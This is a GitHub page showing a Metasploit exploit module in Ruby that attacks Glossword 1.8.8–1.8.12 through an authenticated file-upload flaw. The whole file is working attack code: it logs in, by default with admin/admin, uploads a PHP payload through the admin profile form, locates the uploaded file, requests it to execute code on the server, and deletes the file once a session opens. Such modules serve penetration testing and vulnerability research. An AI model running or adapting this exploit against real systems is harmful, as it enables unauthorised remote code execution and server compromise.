-
Notifications
You must be signed in to change notification settings - Fork 13.9k
/
glossword_upload_exec.rb
188 lines (163 loc) · 6.23 KB
/
glossword_upload_exec.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability",
'Description' => %q{
This module exploits a file upload vulnerability in Glossword
versions 1.8.8 to 1.8.12 when run as a standalone application.
This application has an upload feature that allows an authenticated user
with administrator roles to upload arbitrary files to the 'gw_temp/a/'
directory.
},
'License' => MSF_LICENSE,
'Author' =>
[
'AkaStep', # Discovery
'bcoles' # metasploit exploit
],
'References' =>
[
[ 'EDB', '24456' ],
[ 'OSVDB', '89960' ]
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Automatic Targeting', { 'auto' => true }]],
'Privileged' => true,
'DisclosureDate' => "Feb 05 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path to the web application', '/glossword/1.8/']),
OptString.new('USERNAME', [true, 'The username for Glossword', 'admin']),
OptString.new('PASSWORD', [true, 'The password for Glossword', 'admin'])
])
self.needs_cleanup = true
end
def check
base = target_uri.path
peer = "#{rhost}:#{rport}"
user = datastore['USERNAME']
pass = datastore['PASSWORD']
# login
print_status("Authenticating as user '#{user}'")
begin
res = login(base, user, pass)
if res
if res.code == 200
vprint_error("Authentication failed")
return Exploit::CheckCode::Unknown
elsif res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/
vprint_good("Authenticated successfully")
return Exploit::CheckCode::Appears
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
vprint_error("Connection failed")
end
return Exploit::CheckCode::Safe
end
def on_new_session(client)
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
client.fs.file.rm("#{@fname}")
else
client.shell_command_token("rm #{@fname}")
end
end
def upload(base, sid, fname, file)
user = datastore['USERNAME']
pass = datastore['PASSWORD']
data = Rex::MIME::Message.new
data.add_part(file, 'application/x-php', nil, "form-data; name=\"file_location\"; filename=\"#{fname}\"")
data.add_part("edit-own", nil, nil, 'form-data; name="a"')
data.add_part("users", nil, nil, 'form-data; name="t"')
data.add_part("Save", nil, nil, 'form-data; name="post"')
data.add_part("#{sid}", nil, nil, 'form-data; name="sid"')
data.add_part("#{user}", nil, nil, 'form-data; name="arPost[login]"')
data.add_part("#{pass}", nil, nil, 'form-data; name="arPost[pass_new]"')
data.add_part("#{pass}", nil, nil, 'form-data; name="arPost[pass_confirm]"')
data_post = data.to_s
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(base, 'gw_admin.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data_post,
})
return res
end
def login(base, user, pass)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(base, 'gw_login.php'),
'data' => "arPost%5Buser_name%5D=#{user}&arPost%5Buser_pass%5D=#{pass}&arPost%5Blocale_name%5D=en-utf8&a=login&sid=&post=Enter"
})
return res
end
def exploit
base = target_uri.path
@fname= rand_text_alphanumeric(rand(10)+6) + '.php'
user = datastore['USERNAME']
pass = datastore['PASSWORD']
# login; get session id and token
print_status("Authenticating as user '#{user}'")
res = login(base, user, pass)
if res and res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/
token = "#{$1}"
sid = "#{$2}"
print_good("Authenticated successfully")
else
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end
# upload PHP payload
print_status("Uploading PHP payload (#{payload.encoded.length} bytes)")
php = %Q|<?php #{payload.encoded} ?>|
begin
res = upload(base, sid, @fname, php)
if res and res.code == 301 and res['location'] =~ /Setting saved/
print_good("File uploaded successfully")
else
fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
# retrieve PHP file path
print_status("Locating PHP payload file")
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(base, 'gw_admin.php?a=edit-own&t=users'),
'cookie' => "sid#{token}=#{sid}"
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/
shell_uri = "#{$1}"
@fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)')
print_good("Found payload file path (#{shell_uri})")
else
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find PHP payload file path")
end
# retrieve and execute PHP payload
print_status("Executing payload (#{shell_uri})")
begin
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(base, shell_uri),
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
if !res or res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Executing payload failed")
end
end
end